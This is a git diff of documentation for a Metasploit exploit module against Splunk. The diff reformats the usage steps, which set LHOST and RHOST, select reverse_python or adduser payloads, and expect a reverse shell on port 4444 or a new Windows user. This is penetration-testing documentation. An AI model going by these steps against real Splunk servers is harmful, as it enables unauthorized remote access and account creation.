diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b73714c5f0..bb9dbc57fe 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -21,7 +21,8 @@ This module has been tested successfully against: 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + 8. Set a payload: + * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. 7. You should get either a reverse shell on port 4444 via the predefined handler (Linux/OSX) or a new user in case (windows target)